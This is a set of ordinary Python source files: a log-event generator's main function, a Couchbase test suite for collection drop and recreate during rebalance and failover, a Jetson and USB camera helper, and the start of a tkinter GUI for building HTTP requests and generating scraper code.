with open(config["file"], "a") as log_file:
log_file.write(log_entry + "\n")
def main() -> None:
# Define the command arguments
parser = argparse.ArgumentParser(description="Generate log events")
parser.add_argument(
"config_dir",
metavar="/path/to/config",
type=str,
help="Path to configuration directory or file",
)
parser.add_argument(
"--level",
"-l",
default=logging.getLevelName(logging.INFO),
help="Logging level",
)
parser.add_argument(
"--truncate", "-t", action="store_true", help="Truncate the log files on start"
)
args = parser.parse_args()
# Get the logger
logging.basicConfig(
stream=sys.stderr,
level=args.level,
format="%(asctime)s %(levelname)-8s %(message)s",
)
logger = logging.getLogger()
# Create the generator
generator = Generator(args.config_dir, args.truncate)
generator.logger = logger
# Specify the signal handler
signal.signal(signal.SIGINT, generator.handle_signal)
signal.signal(signal.SIGHUP, generator.handle_signal)
# Run the generator
try:
generator.run()
except FileNotFoundError as err:
generator.logger.critical(err)
sys.exit(1)
if __name__ == "__main__":
main()
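# Illustrative configuration sketch (an assumption inferred from the keys this
# script reads; schema.yaml remains the authoritative format):
#
#   name: web-access
#   enabled: true
#   file: /tmp/logs/access.log
#   amount: 5
#   frequency: {seconds: 10}
#   jitter: {seconds: 5}
#   format: "{timestamp} {client} {status}"
#   fields:
#     timestamp: {type: timestamp, format: "%Y-%m-%dT%H:%M:%S"}
#     client: {type: ip}
#     status: {type: enum, values: [200, 301, 404]}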
|
collections_drop_recreate_rebalance.py
|
import threading
import time
import json
from Cb_constants import CbServer
from collections_helper.collections_spec_constants import MetaCrudParams
from bucket_collections.collections_base import CollectionBase
from membase.api.rest_client import RestConnection
from bucket_utils.bucket_ready_functions import BucketUtils
from couchbase_helper.tuq_helper import N1QLHelper
from platform_utils.remote.remote_util import RemoteMachineShellConnection
from table_view import TableView
class CollectionsDropRecreateRebalance(CollectionBase):
def setUp(self):
super(CollectionsDropRecreateRebalance, self).setUp()
self.known_nodes = self.cluster.servers[:self.nodes_init]
self.nodes_failover = self.input.param("nodes_failover", 1)
self.nodes_swap = self.input.param("nodes_swap", 0)
self.recovery_type = self.input.param("recovery_type", "delta")
self.rebalance_moves_per_node = self.input.param("rebalance_moves_per_node", 2)
self.sleep_between_collections_crud = self.input.param("sleep_between_collections_crud", None)
self.cluster_util.set_rebalance_moves_per_nodes(
self.cluster.master,
rebalanceMovesPerNode=self.rebalance_moves_per_node)
self.change_ephemeral_purge_age_and_interval = self.input.param("change_ephemeral_purge_age_and_interval",
True)
if self.change_ephemeral_purge_age_and_interval:
self.set_ephemeral_purge_age_and_interval()
self.data_load_flag = False # When to start/stop drop/recreate
self.data_loading_thread = None
self.data_load_exception = None # Object variable to assign data load thread's exception
self.N1qltxn = self.input.param("N1ql_txn", False)
if self.N1qltxn:
self.n1ql_server = self.cluster_util.get_nodes_from_services_map(
cluster=self.cluster,
service_type=CbServer.Services.N1QL,
get_all_nodes=True)
self.n1ql_helper = N1QLHelper(server=self.n1ql_server,
use_rest=True,
buckets = self.cluster.buckets,
log=self.log,
scan_consistency='REQUEST_PLUS',
num_collection=3,
num_buckets=1,
num_savepoints=1,
override_savepoint=False,
num_stmt=10,
load_spec=self.data_spec_name)
self.bucket_col = self.n1ql_helper.get_collections()
self.stmts = self.n1ql_helper.get_stmt(self.bucket_col)
self.stmts = self.n1ql_helper.create_full_stmts(self.stmts)
def tearDown(self):
self.cluster_util.set_rebalance_moves_per_nodes(
self.cluster.master, rebalanceMovesPerNode=4)
if self.data_loading_thread:
# stop data loading before tearDown if its still running
self.data_load_flag = False
self.data_loading_thread.join()
self.data_loading_thread = None
if self.N1qltxn:
super(CollectionBase, self).tearDown()
else:
super(CollectionsDropRecreateRebalance, self).tearDown()
def set_ephemeral_purge_age_and_interval(self, ephemeral_metadata_purge_age=0,
ephemeral_metadata_purge_interval=1):
"""
Enables diag eval on master node and updates the above two parameters
for all ephemeral buckets on the cluster
"""
shell = RemoteMachineShellConnection(self.cluster.master)
shell.enable_diag_eval_on_non_local_hosts()
shell.disconnect()
ephemeral_buckets = [bucket for bucket in self.cluster.buckets if bucket.bucketType == "ephemeral"]
for ephemeral_bucket in ephemeral_buckets:
rest = RestConnection(self.cluster.master)
status, content = rest.set_ephemeral_purge_age_and_interval(bucket=ephemeral_bucket.name,
ephemeral_metadata_purge_age=ephemeral_metadata_purge_age,
ephemeral_metadata_purge_interval=ephemeral_metadata_purge_interval)
if not status:
raise Exception(content)
def pick_nodes_for_rebalance(self):
if self.nodes_swap:
self.nodes_in = self.nodes_out = self.nodes_swap
self.add_nodes = self.cluster.servers[self.nodes_init:self.nodes_init + self.nodes_in]
self.remove_nodes = self.cluster.servers[:self.nodes_out]
self.cluster.master = self.master = self.cluster.servers[self.nodes_out]
self.rest = RestConnection(self.cluster.master)
def pick_nodes_for_failover(self, rebalance_operation):
self.failover_nodes = self.cluster.servers[:self.nodes_failover]
# Change the orchestrator, if there is rebalance-out of orchestrator after failover
if "rebalance_out" in rebalance_operation:
self.cluster.master = self.master = self.cluster.servers[self.nodes_failover]
self.rest = RestConnection(self.cluster.master)
def wait_for_failover_or_assert(self, expected_failover_count, timeout=300):
time_start = time.time()
time_max_end = time_start + timeout
actual_failover_count = 0
while time.time() < time_max_end:
actual_failover_count = self.get_failover_count()
if actual_failover_count == expected_failover_count:
break
time.sleep(20)
time_end = time.time()
if actual_failover_count != expected_failover_count:
self.log.info(self.rest.print_UI_logs())
self.assertTrue(actual_failover_count == expected_failover_count,
"{0} nodes failed over, expected : {1}"
.format(actual_failover_count,
expected_failover_count))
self.log.info("{0} nodes failed over as expected in {1} seconds"
.format(actual_failover_count, time_end - time_start))
def get_failover_count(self):
rest = RestConnection(self.cluster.master)
cluster_status = rest.cluster_status()
failover_count = 0
# check for inactiveFailed
for node in cluster_status['nodes']:
if node['clusterMembership'] == "inactiveFailed":
failover_count += 1
return failover_count
def wait_for_rebalance_to_complete(self, task):
self.task.jython_task_manager.get_task_result(task)
self.assertTrue(task.result, "Rebalance Failed")
def spec_for_drop_recreate(self):
spec = {
# Scope/Collection ops params
MetaCrudParams.COLLECTIONS_TO_FLUSH: 0,
MetaCrudParams.COLLECTIONS_TO_DROP: 250,
MetaCrudParams.SCOPES_TO_DROP: 3,
MetaCrudParams.SCOPES_TO_ADD_PER_BUCKET: 0,
MetaCrudParams.COLLECTIONS_TO_ADD_FOR_NEW_SCOPES: 0,
MetaCrudParams.COLLECTIONS_TO_ADD_PER_BUCKET: 0,
# Only dropped scope/collection will be created.
# While scope recreated all prev collection will also be created
# In both the collection creation case, previous maxTTL value of
# individual collection is considered
MetaCrudParams.SCOPES_TO_RECREATE: 3,
MetaCrudParams.COLLECTIONS_TO_RECREATE: 250,
# Applies only for the above listed scope/collection operations
MetaCrudParams.BUCKET_CONSIDERED_FOR_OPS: "all",
MetaCrudParams.SCOPES_CONSIDERED_FOR_OPS: "all",
MetaCrudParams.COLLECTIONS_CONSIDERED_FOR_OPS: "all",
}
return spec
def print_spec_details(self, spec, cycles, elapsed_time):
table = TableView(self.log.info)
table.set_headers(["Operation", "Value"])
table.add_row(["Collections dropped and recreated", str(spec[MetaCrudParams.COLLECTIONS_TO_RECREATE])])
table.add_row(["Scopes dropped and recreated", str(spec[MetaCrudParams.SCOPES_TO_RECREATE])])
table.add_row(["Cycles of data load", str(cycles)])
table.add_row(["Time Elapsed in secs", str(elapsed_time)])
table.display("Data load details")
def data_load(self):
cycles = 0
start_time = time.time()
while self.data_load_flag:
doc_loading_spec = self.spec_for_drop_recreate()
try:
_ = BucketUtils.perform_tasks_from_spec(self.cluster,
self.cluster.buckets,
doc_loading_spec)
except Exception as e:
self.data_load_exception = e
raise
cycles = cycles + 1
# TODO : This sleep is intentionally added. See MB-47533
# TODO : Needs to be reverted when MB-47810 is fixed
if self.sleep_between_collections_crud:
time.sleep(self.sleep_between_collections_crud)
end_time = time.time()
elapsed_time = end_time - start_time
self.print_spec_details(self.spec_for_drop_recreate(), cycles, elapsed_time)
def load_collections_with_rebalance(self, rebalance_operation):
self.pick_nodes_for_rebalance()
if self.N1qltxn:
self.N1ql_load_task = self.task.async_n1qlTxn_query( self.stmts,
n1ql_helper=self.n1ql_helper,
commit=True,
scan_consistency="REQUEST_PLUS")
else:
self.data_load_flag = True
self.data_loading_thread = threading.Thread(target=self.data_load)
self.data_loading_thread.start()
if rebalance_operation == "rebalance_in":
operation = self.task.async_rebalance(self.known_nodes, self.add_nodes, [],
retry_get_process_num=self.retry_get_process_num*3)
elif rebalance_operation == "rebalance_out":
operation = self.task.async_rebalance(self.known_nodes, [], self.remove_nodes,
retry_get_process_num=self.retry_get_process_num*3)
elif rebalance_operation == "swap_rebalance":
for node in self.add_nodes:
self.rest.add_node(self.cluster.master.rest_username, self.cluster.master.rest_password,
node.ip, self.cluster.servers[self.nodes_init].port)
operation = self.task.async_rebalance(self.known_nodes, [], self.remove_nodes,
check_vbucket_shuffling=False,
retry_get_process_num=self.retry_get_process_num*3)
elif rebalance_operation == "rebalance_in_out":
for node in self.add_nodes:
self.rest.add_node(self.cluster.master.rest_username, self.cluster.master.rest_password,
node.ip, self.cluster.servers[self.nodes_init].port)
operation = self.task.async_rebalance(self.known_nodes, [], self.remove_nodes,
check_vbucket_shuffling=False,
retry_get_process_num=self.retry_get_process_num*3)
self.wait_for_rebalance_to_complete(operation)
self.data_load_flag = False
if not self.N1qltxn:
self.data_loading_thread.join()
self.data_loading_thread = None
if self.data_load_exception:
self.log.error("Caught exception from data load thread")
self.fail(self.data_load_exception)
def load_collections_with_failover(self, rebalance_operation):
self.pick_nodes_for_failover(rebalance_operation)
if self.N1qltxn:
self.N1ql_load_task = self.task.async_n1qlTxn_query( self.stmts,
n1ql_helper=self.n1ql_helper,
commit=True,
scan_consistency="REQUEST_PLUS")
else:
self.data_load_flag = True
self.data_loading_thread = threading.Thread(target=self.data_load)
self.data_loading_thread.start()
graceful = True if "graceful" in rebalance_operation else False
failover_count = 0
self.log.info("failing over nodes {0}".format(self.failover_nodes))
for failover_node in self.failover_nodes:
_ = self.task.failover(self.known_nodes, failover_nodes=[failover_node],
graceful=graceful, wait_for_pending=120)
failover_count = failover_count + 1
self.wait_for_failover_or_assert(failover_count)
if "recovery" in rebalance_operation:
for failover_node in self.failover_nodes:
self.rest.set_recovery_type(otpNode='ns_1@' + failover_node.ip,
recoveryType=self.recovery_type)
operation = self.task.async_rebalance(self.known_nodes, [], [],
retry_get_process_num=self.retry_get_process_num*3)
else:
operation = self.task.async_rebalance(self.known_nodes, [], self.failover_nodes,
retry_get_process_num=self.retry_get_process_num*3)
self.wait_for_rebalance_to_complete(operation)
self.sleep(60, "Wait after rebalance completes before stopping data load")
self.data_load_flag = False
if not self.N1qltxn:
self.data_loading_thread.join()
self.data_loading_thread = None
if self.data_load_exception:
self.log.error("Caught exception from data load thread")
self.fail(self.data_load_exception)
def test_data_load_collections_with_rebalance_in(self):
self.load_collections_with_rebalance(rebalance_operation="rebalance_in")
def test_data_load_collections_with_rebalance_out(self):
self.load_collections_with_rebalance(rebalance_operation="rebalance_out")
def test_data_load_collections_with_swap_rebalance(self):
self.load_collections_with_rebalance(rebalance_operation="swap_rebalance")
def test_data_load_collections_with_rebalance_in_out(self):
self.load_collections_with_rebalance(rebalance_operation="rebalance_in_out")
def test_data_load_collections_with_graceful_failover_rebalance_out(self):
self.load_collections_with_failover(rebalance_operation="graceful_failover_rebalance_out")
def test_data_load_collections_with_hard_failover_rebalance_out(self):
self.load_collections_with_failover(rebalance_operation="hard_failover_rebalance_out")
def test_data_load_collections_with_graceful_failover_recovery(self):
self.load_collections_with_failover(rebalance_operation="graceful_failover_recovery")
def test_data_load_collections_with_hard_failover_recovery(self):
self.load_collections_with_failover(rebalance_operation="hard_failover_recovery")
|
camera_setting.py
|
import logging
import threading
import subprocess
import numpy as np
import cv2
USB_GSTREAMER = True
def add_camera_args(parser):
"""Add parser augument for camera options."""
parser.add_argument('--file', dest='use_file',
help='use a video file as input (remember to '
'also set --filename)',
action='store_true')
parser.add_argument('--image', dest='use_image',
help='use an image file as input (remember to '
'also set --filename)',
action='store_true')
parser.add_argument('--filename', dest='filename',
help='video file name, e.g. test.mp4',
default=None, type=str)
parser.add_argument('--usb', dest='use_usb',
help='use USB webcam (remember to also set --vid)',
action='store_true')
parser.add_argument('--vid', dest='video_dev',
help='device # of USB webcam (/dev/video?) [0]',
default=0, type=int)
parser.add_argument('--width', dest='image_width',
help='image width [640]',
default=640, type=int)
parser.add_argument('--height', dest='image_height',
help='image height [480]',
default=480, type=int)
return parser
def open_cam_usb(dev, width, height):
"""Open a USB webcam."""
if USB_GSTREAMER:
gst_str = ('v4l2src device=/dev/video{} ! '
'video/x-raw, width=(int){}, height=(int){} ! '
'videoconvert ! appsink').format(dev, width, height)
return cv2.VideoCapture(gst_str, cv2.CAP_GSTREAMER)
else:
return cv2.VideoCapture(dev)
def open_cam_onboard():
"""Open the Jetson onboard camera."""
gst_str = ("nvarguscamerasrc ! "
"video/x-raw(memory:NVMM), "
"width=(int)1280, height=(int)720, "
"format=(string)NV12, framerate=(fraction)60/1 ! "
"nvvidconv flip-method=0 ! "
"video/x-raw, width=(int)1280, height=(int)720, format=(string)BGRx ! "
"videoconvert ! "
"video/x-raw, format=(string)BGR ! appsink")
return cv2.VideoCapture(gst_str, cv2.CAP_GSTREAMER)
def grab_img(cam):
"""This 'grab_img' function is designed to be run in the sub-thread.
Once started, this thread continues to grab a new image and put it
into the global 'img_handle', until 'thread_running' is set to False.
"""
while cam.thread_running:
_, cam.img_handle = cam.cap.read()
if cam.img_handle is None:
logging.warning('grab_img(): cap.read() returns None...')
break
cam.thread_running = False
class VideoWriter:
    def __init__(self, width, height, args, fps=24):
        # width and height are ints, args is the parsed argparse namespace (must provide output_file), fps is an int
        assert args.output_file.endswith('.mp4'), 'output_file must end with .mp4'
# self._name = name
# self._height = height
# self._width = width
self.args = args
fourcc = cv2.VideoWriter_fourcc(*'mp4v')
self.__writer = cv2.VideoWriter(args.output_file, fourcc, fps, (width, height))
def write(self, frame):
        if frame.dtype != np.uint8: # check the frame's dtype
raise ValueError('frame.dtype should be np.uint8')
self.__writer.write(frame)
def release(self):
self.__writer.release()
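# Minimal usage sketch (an illustration, not part of the original module): VideoWriter
# only needs an object exposing 'output_file', so a tiny namespace stands in for args.
# import types
# _fake_args = types.SimpleNamespace(output_file='demo.mp4')
# _vw = VideoWriter(width=640, height=480, args=_fake_args, fps=24)
# _vw.write(np.zeros((480, 640, 3), dtype=np.uint8))  # one black frame of matching size
# _vw.release()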
class Camera():
"""Camera class which supports reading images from theses video sources:
1. Video file
2. USB webcam
3. Jetson onboard camera
"""
def __init__(self, args):
self.args = args
self.is_opened = False
self.use_thread = False
self.thread_running = False
self.img_handle = None
self.img_width = 0
self.img_height = 0
self.cap = None
self.thread = None
#-----#
self.vwriter = None
def open(self):
"""Open camera based on command line arguments."""
assert self.cap is None, 'Camera is already opened!'
args = self.args
if args.use_file: #video
self.cap = cv2.VideoCapture(args.filename)
# ignore image width/height settings here
            # TODO: attribute names may differ between OpenCV versions and raise errors here
width, height = int(self.cap.get(cv2.CAP_PROP_FRAME_WIDTH)), \
int(self.cap.get(cv2.CAP_PROP_FRAME_HEIGHT))
self.vwriter = VideoWriter(width=width, height=height, args=args, fps=24)
self.use_thread = False
# elif args.use_image:
# self.cap = 'OK'
# self.img_handle = cv2.imread(args.filename)
# # ignore image width/height settings here
# if self.img_handle is not None:
# self.is_opened = True
# self.img_height, self.img_width, _ = self.img_handle.shape
# self.use_thread = False
elif args.use_usb:
self.cap = open_cam_usb(
args.video_dev,
args.image_width,
args.image_height
)
self.use_thread = True
else: # by default, use the jetson onboard camera
self.cap = open_cam_onboard()
print('using onboard cam now !')
self.use_thread = True
if self.cap != 'OK':
if self.cap.isOpened():
# Try to grab the 1st image and determine width and height
_, img = self.cap.read()
if img is not None:
self.img_height, self.img_width, _ = img.shape
self.is_opened = True
#-------thread-----------------#
def start(self):
assert not self.thread_running
if self.use_thread:
self.thread_running = True
self.thread = threading.Thread(target=grab_img, args=(self,))
self.thread.start()
def stop(self):
self.thread_running = False
if self.use_thread:
self.thread.join()
def read(self):
if self.args.use_file:
_, img = self.cap.read()
# if img is None:
# #logging.warning('grab_img(): cap.read() returns None...')
# # looping around
# self.cap.release()
# self.cap = cv2.VideoCapture(self.args.filename)
# _, img = self.cap.read()
return img
elif self.args.use_image:
return np.copy(self.img_handle)
else:
return self.img_handle
def write(self, frame):
if self.vwriter:
self.vwriter.write(frame)
def release(self):
# if self.cap != 'OK':
self.cap.release()
if self.vwriter is not None:
self.vwriter.release()
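# Minimal usage sketch (an assumption-level example, not part of the original tool):
# it exercises the open/start/read/stop/release lifecycle of Camera. The
# '--output-file' argument is hypothetical and only added because VideoWriter reads it
# when a video file is used as the source.
if __name__ == '__main__':
    import argparse
    _parser = add_camera_args(argparse.ArgumentParser())
    _parser.add_argument('--output-file', dest='output_file', default='out.mp4', type=str)
    _args = _parser.parse_args()
    _cam = Camera(_args)
    _cam.open()                       # choose the source from the parsed arguments
    _cam.start()                      # spawns grab_img() only for threaded sources
    try:
        for _ in range(100):
            _frame = _cam.read()      # latest frame, or None before the first grab arrives
            if _frame is not None:
                _cam.write(_frame)    # no-op unless a VideoWriter was created for a file source
    finally:
        _cam.stop()
        _cam.release()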
|
frame.py
|
try:
import requests
except:
requests = None
import io
import os
import re
import sys
import json
import zlib
import time
import hmac
import queue
import shutil
import base64
import hashlib
import tempfile
import traceback
import threading
import tkinter
import inspect
import zipfile
import itertools
import urllib.parse as ps
import tkinter.messagebox
from tkinter import ttk
from tkinter import scrolledtext
from tkinter.font import Font
from tkinter.simpledialog import askstring
from binascii import a2b_hex, b2a_hex
try:
from .root import DEFAULTS_HEADERS,root
except:
from root import DEFAULTS_HEADERS,root
Text = scrolledtext.ScrolledText
#Text = tkinter.Text
Label = ttk.Label
Button = ttk.Button
Combobox = ttk.Combobox
Entry = ttk.Entry
Checkbutton = tkinter.Checkbutton
# Try both Frame variants
# Frame = ttk.Frame # ttk.Frame does not support the highlightthickness option
Frame = tkinter.Frame
frame_setting = {}
pdx = 0
pdy = 0
lin = 0
def request_window(setting=None):
fr = Frame()
ft = Font(family='Consolas',size=10)
def change_method(*a):
method = cbx.get()
if method == 'POST':
temp_fr2.pack(fill=tkinter.BOTH,expand=True,side=tkinter.BOTTOM)
elif method == 'GET':
temp_fr2.pack_forget()
def test_code(*a):
from .tab import create_test_code
create_test_code()
def scrapy_code(*a):
from .tab import create_scrapy_code
create_scrapy_code()
def urllib_code(*a):
from .tab import create_test_code_urllib
create_test_code_urllib()
def send_req(*a):
from .tab import send_request
send_request()
def _swich_encd(*a):
s = ent1.get().strip()
if s == 'utf-8':
ent1.delete(0,tkinter.END)
ent1.insert(0,'gbk')
elif s == 'gbk':
ent1.delete(0,tkinter.END)
ent1.insert(0,'utf-8')
else:
ent1.delete(0,tkinter.END)
ent1.insert(0,'utf-8')
def _swich_quote(*a):
s = ent2.get().strip()
if s == 'yes':
ent2.delete(0,tkinter.END)
ent2.insert(0,'no')
elif s == 'no':
ent2.delete(0,tkinter.END)
ent2.insert(0,'yes')
else:
ent2.delete(0,tkinter.END)
ent2.insert(0,'yes')
def _select_create_code(*a):
from .tab import nb
from .tab import SimpleDialog
q = [ '生成[requests]代码[Alt+c]',
'生成[scrapy]代码[Alt+s]',
'生成[urllib]代码[Alt+u]', ]
d = SimpleDialog(nb,
text="请选择生成的代码",
buttons=q,
default=0,
cancel=-1,
title="生成代码")
id = d.go()
if id == -1: return
if id == 0: test_code()
if id == 1: scrapy_code()
if id == 2: urllib_code()
temp_fr0 = Frame(fr)
methods = ('GET','POST')
cbx = Combobox(temp_fr0,width=10,state='readonly')
    cbx['values'] = methods # set the dropdown list values
cbx.current(0)
cbx.pack(side=tkinter.RIGHT)
cbx.bind('<<ComboboxSelected>>', change_method)
temp_fr0.pack(fill=tkinter.X)
btn1 = Button(temp_fr0, text='发送请求[Ctrl+r]', command=send_req)
btn1.pack(side=tkinter.RIGHT)
ent1 = Entry(temp_fr0,width=6)
ent1.pack(side=tkinter.RIGHT)
btnurlencode = Button(temp_fr0, width=14, text='url中文编码格式', command=_swich_encd)
btnurlencode.pack(side=tkinter.RIGHT)
ent2 = Entry(temp_fr0,width=4)
ent2.pack(side=tkinter.RIGHT)
btnurlencode1 = Button(temp_fr0, width=18, text='url是否编码“+”符号', command=_swich_quote)
btnurlencode1.pack(side=tkinter.RIGHT)
lab1 = Label(temp_fr0, text='请尽量发送请求后生成代码,那样会有更多功能:')
lab1.pack(side=tkinter.LEFT)
# btn6 = Button(temp_fr0, text='生成[requests]代码[Alt+c]', command=test_code)
# btn6.pack(side=tkinter.LEFT)
# btn7 = Button(temp_fr0, text='生成[scrapy]代码[Alt+s]', command=scrapy_code)
# btn7.pack(side=tkinter.LEFT)
# btn8 = Button(temp_fr0, text='生成[urllib]代码[Alt+u]', command=urllib_code)
# btn8.pack(side=tkinter.LEFT)
def local_collection(*a):
def _show(*a, stat='show'):
try:
if stat == 'show': et.pack(side=tkinter.RIGHT)
if stat == 'hide': et.pack_forget()
except:
pass
_show(stat='show') if va.get() else _show(stat='hide')
va = tkinter.IntVar()
rb = Checkbutton(temp_fr0,text='使用代理',variable=va,command=local_collection)
rb.deselect()
et = Entry (temp_fr0, width=16)
et.insert(0, '127.0.0.1:8888')
rb.pack(side=tkinter.RIGHT)
btn9 = Button(temp_fr0, text='选择生成代码', command=_select_create_code)
btn9.pack(side=tkinter.LEFT)
temp_fr1 = Frame(fr,highlightthickness=lin)
temp_fold_fr1 = Frame(temp_fr1)
temp_fold_fr2 = Frame(temp_fr1)
lb1 = Label (temp_fold_fr1,text='url')
tx1 = Text (temp_fold_fr1,height=1,width=1,font=ft)
lb1.pack(side=tkinter.TOP)
tx1.pack(fill=tkinter.BOTH,expand=True,side=tkinter.TOP,padx=pdx,pady=pdy)
lb2 = Label (temp_fold_fr2,text='headers')
tx2 = Text (temp_fold_fr2,height=1,width=1,font=ft)
lb2.pack(side=tkinter.TOP)
tx2.pack(fill=tkinter.BOTH,expand=True,side=tkinter.TOP,padx=pdx,pady=pdy)
temp_fold_fr1.pack(fill=tkinter.BOTH,expand=True,side=tkinter.LEFT)
temp_fold_fr2.pack(fill=tkinter.BOTH,expand=True,side=tkinter.LEFT)
temp_fr1.pack(fill=tkinter.BOTH,expand=True,side=tkinter.TOP)
temp_fr2 = Frame(fr,highlightthickness=lin)
lb3 = Label (temp_fr2,text='body')
tx3 = Text (temp_fr2,height=1,width=1,font=ft)
lb3.pack(side=tkinter.TOP)
tx3.pack(fill=tkinter.BOTH,expand=True,padx=pdx,pady=pdy)
if setting and setting.get('method') == 'POST':
cbx.current(methods.index('POST'))
temp_fr2.pack(fill=tkinter.BOTH,expand=True,side=tkinter.BOTTOM)
if setting:
tx1.insert(0.,setting['url'].strip())
tx2.insert(0.,setting['headers'].strip())
tx3.insert(0.,setting['body'].strip())
ent1.insert(0,setting.get('urlenc') or 'utf-8')
ent2.insert(0,setting.get('qplus') or 'no')
if setting.get('proxy'):
et.delete(0, tkinter.END)
et.insert(0, setting.get('proxy'))
et.pack(side=tkinter.RIGHT)
rb.select()
else:
tx2.insert(0.,DEFAULTS_HEADERS.strip())
ent1.insert(0,'utf-8')
ent2.insert(0,'no')
frame_setting[fr] = {}
frame_setting[fr]['type'] = 'request'
frame_setting[fr]['fr_method'] = cbx
frame_setting[fr]['fr_url'] = tx1
frame_setting[fr]['fr_headers'] = tx2
frame_setting[fr]['fr_body'] = tx3
frame_setting[fr]['fr_urlenc'] = ent1
frame_setting[fr]['fr_qplus'] = ent2
frame_setting[fr]['fr_proxy'] = va, et
return fr
def response_window(setting=None):
    '''
    The 'setting' passed in should be a request-info data structure:
    a dict whose values have already been normalized. When the request
    task finishes, the returned data is placed into the response frame
    following this layout:
        url     :str
        method  :str
        headers :dict
        body    :str
    '''
def insert_txt(fr_txt, txt):
try:
fr_txt.delete(0.,tkinter.END)
fr_txt.insert(0.,re.sub('[\uD800-\uDBFF][\uDC00-\uDFFF]|[\U00010000-\U0010ffff]','',txt))
except:
pass
doc0 = '''选择列表解析路径方式
冒号后面配置的的内容为 xpath
<xpath:>
*组合功能!
如果先使用了 “分析xpath” 功能后解析到路径
那么使用该功能时会自动弹出选择窗口
选择窗中的内容为自动解析xpath中解析出的 xpath
'''
doc1 = '''纯文字内容解析
解析某个 xpath 路径下面的所有文字字符串,默认是 //html 路径下的所有文字
<normal_content://html>
'''
doc2 = '''根据字符串自动分析 xpath 路径
一般用于列表形式的路径
通常来说这个功能针对简单的网页结构还勉强有用,并非一定能够解析
所以一些比较复杂的网页或许还是需要考虑自行分析xpath。
冒号后面配置需要处理的字符串
多个字符串可以通过空格分隔
eg.:
<auto_list_xpath:白天 黑夜>
不写则为查找所有 "string(.)" (xpath语法)
能解析出含有非空字符串的内容路径
'''
doc3 = '''简单分析json数据内容
找出最长的list进行初步的迭代分析,并给出分析结果在输出框
如果没有主动选择某一个json列表,则默认使用第一个最长的列表
进行默认的代码生成
<auto_list_json:>
'''
doc4 = '''选择分析的json列表
选择的json列表的解析方式放在auto_list_json配置的后面
当你生成代码的时候将会使用这个进行对列表解析自动生成对应的代码
下面是一个例子:
<auto_list_json:jsondata["data"]["list"]>
'''
doc5 = '''生成scrapy代码
如果存在 “解析xpath”、“自动json” 或 “获取纯文字” 状态
则会在生成代码中包含相应的代码
'''
doc6 = '''生成requests代码
如果存在 “解析xpath”、“自动json” 或 “获取纯文字” 状态
则会在生成代码中包含相应的代码
'''
def document(*a):
method = cbx.get()
if methods.index(method) == 0:
insert_txt(tx3,doc0)
if methods.index(method) == 1:
insert_txt(tx3,doc1)
if methods.index(method) == 2:
insert_txt(tx3,doc2)
if methods.index(method) == 3:
insert_txt(tx3,doc3)
if methods.index(method) == 4:
insert_txt(tx3,doc4)
if methods.index(method) == 5:
insert_txt(tx3,doc5)
if methods.index(method) == 6:
insert_txt(tx3,doc6)
switch_show(onlyshow=True)
fr = Frame()
ft = Font(family='Consolas',size=10)
def switch_show(*a, onlyshow=False):
try:
temp_fold_fr2.pack_info()
packed = True
except:
packed = False
if packed:
if not onlyshow:
temp_fold_fr2.pack_forget()
else:
temp_fold_fr2.pack(fill=tkinter.BOTH,expand=True,side=tkinter.LEFT)
def html_pure_text(*a):
from .tab import get_html_pure_text
get_html_pure_text()
def xpath_elements(*a):
from .tab import get_xpath_elements
get_xpath_elements()
def auto_xpath(*a):
from .tab import get_auto_xpath
get_auto_xpath()
def auto_json(*a):
from .tab import get_auto_json
get_auto_json()
def choice_json(*a):
from .tab import choice_auto_json
choice_auto_json()
def test_code(*a):
from .tab import create_test_code
create_test_code()
def scrapy_code(*a):
from .tab import create_scrapy_code
create_scrapy_code()
def urllib_code(*a):
from .tab import create_test_code_urllib
create_test_code_urllib()
def jsonformat(*a):
from .tab import response_jsonformat
response_jsonformat()
def xpath_finder(*a):
from .tab import nb
from .tab import create_xpath_finder
setting = {}
setting['content'] = tx1.get(0.,tkinter.END).strip()
setting['master'] = nb
s = create_xpath_finder(setting)
tx2.delete(0., tkinter.END)
tx2.insert(0., '<just_info:>\n' + s)
def _select_analysis(*a):
from .tab import nb
from .tab import SimpleDialog
q = [ '(Alt+f)分析xpath',
'(Alt+x)选择xpath',
'(Alt+z)分析json',
'(Alt+q)选择json',
'(Alt+d)获取纯文字',
'xpath内容分析', ]
d = SimpleDialog(nb,
text="请选择分析内容的方式,分析后再生成代码,会自动在代码内带有分析处理的代码块。",
buttons=q,
default=0,
cancel=-1,
title="分析内容")
id = d.go()
if id == -1: return
if id == 0: auto_xpath()
if id == 1: xpath_elements()
if id == 2: auto_json()
if id == 3: choice_json()
if id == 4: html_pure_text()
if id == 5: xpath_finder()
def _select_create_code(*a):
from .tab import nb
from .tab import SimpleDialog
q = [ '生成[requests]代码[Alt+c]',
'生成[scrapy]代码[Alt+s]',
'生成[urllib]代码[Alt+u]', ]
d = SimpleDialog(nb,
text="请选择生成的代码",
buttons=q,
default=0,
cancel=-1,
title="生成代码")
id = d.go()
if id == -1: return
if id == 0: test_code()
if id == 1: scrapy_code()
if id == 2: urllib_code()
temp_fr0 = Frame(fr)
lab1 = Label(temp_fr0, text='功能说明:')
lab1.pack(side=tkinter.LEFT)
methods = ('(Alt+x) 选择xpath','(Alt+d) 获取纯文字','(Alt+f) 分析xpath','(Alt+z) 分析json','(Alt+q) 选择json', '(Alt+s) 生成 scrapy代码', '(Alt+c) 生成 requests代码')
cbx = Combobox(temp_fr0,width=18,state='readonly')
    cbx['values'] = methods # set the dropdown list values
cbx.current(0)
cbx.pack(side=tkinter.LEFT)
cbx.bind('<<ComboboxSelected>>', document)
temp_fr0.pack(fill=tkinter.X)
btn11 = Button(temp_fr0, text='选择内容分析', command=_select_analysis)
btn11.pack(side=tkinter.LEFT)
# btn3 = Button(temp_fr0, text='(f)分析xpath', command=auto_xpath)
# btn3.pack(side=tkinter.LEFT)
# btn4 = Button(temp_fr0, text='(x)选择xpath', command=xpath_elements)
# btn4.pack(side=tkinter.LEFT)
# btn5 = Button(temp_fr0, text='(z)分析json', command=auto_json)
# btn5.pack(side=tkinter.LEFT)
# btn9 = Button(temp_fr0, text='(q)选择json', command=choice_json)
# btn9.pack(side=tkinter.LEFT)
# btn2 = Button(temp_fr0, text='(d)获取纯文字', command=html_pure_text)
# btn2.pack(side=tkinter.LEFT)
# btn10 = Button(temp_fr0, text='xpath内容分析', command=xpath_finder)
# btn10.pack(side=tkinter.LEFT)
btn9 = Button(temp_fr0, text='json格式化', command=jsonformat)
btn9.pack(side=tkinter.LEFT)
style = ttk.Style()
style.map("TEST.TButton",
foreground=[('!focus', '#EE6363')],
)
lab2 = Label(temp_fr0, text="正在请求", style='TEST.TButton')
